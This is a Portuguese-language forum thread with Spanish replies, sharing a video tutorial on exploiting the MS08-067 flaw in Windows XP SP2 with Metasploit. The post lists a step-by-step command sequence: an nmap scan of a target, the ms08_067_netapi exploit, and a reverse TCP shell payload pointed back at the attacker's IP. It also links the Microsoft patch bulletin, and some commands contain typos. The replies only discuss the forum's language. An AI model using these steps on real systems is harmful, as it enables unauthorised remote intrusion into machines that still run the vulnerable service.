Nessa video aula mostro como usar o
metasploit para explorar falha de segurança no sistema operacional
Windows XP profissional sp2, que permite execução remota.
Programas usados:Metasploit framework 3 (http://"http://www.metasploit.com/")
Nmap (http://"http://nmap.org/")
Exploit usado:
Citarms08_067_netapi
Payload(carga) usado:
Citarshell_reverse_tcp
Tudo encontrado no BackTrack 4.
Solução da falha: Clique aqui (http://"http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx")
Comandos:
Citar
nmap -sS -O Ip_do_alvo
cd /pentest/exploits/framework3
./msfconsole
show exploits
use windown/smb/ms08_067_netapi
show options
set rhots IP_do_alvo
set rport Porta
set payload /windows/shell/reverse_tcp
set lhost Meu_IP
set id "0" (0 e para encontrar o windows automaticamente, caso não encontre, digitar "info" vai ter o id de vários windows)
exploit
Download:Citarhttp://www.4shared.com/file/692nIMUK/Metasploit-ms08_067_netapi.htm (http://www.4shared.com/file/692nIMUK/Metasploit-ms08_067_netapi.htm)
Assista on-line:Citarhttp://blip.tv/file/3534979
Abraços[]
Jeje muito obrigado pelo tuto, ainda que debo recordar-te que a comunidade do foro é de fala hispana.
Saludos
Cita de: ..::| D3Bć1 |::. en 9 Mayo 2010, 16:55 PM
Jeje muito obrigado pelo tuto, ainda que debo recordar-te que a comunidade do foro é de fala hispana.
Saludos
Sim, tenho consciência que e uma comunidade espanhola. Tenho uma comunidade Brasileira também.
Abraços
______________________
Sí, me doy cuenta de eso y una comunidad española. Tengo una comunidad brasileña también.
Abrazos
Cita de: ..::| D3Bć1 |::. en 9 Mayo 2010, 16:55 PM
Jeje muito obrigado pelo tuto, ainda que debo recordar-te que a comunidade do foro é de fala hispana.
Saludos
Todos entendemos el brasileño y quien no que se lo haga mirar xd
Muito obrigado ::)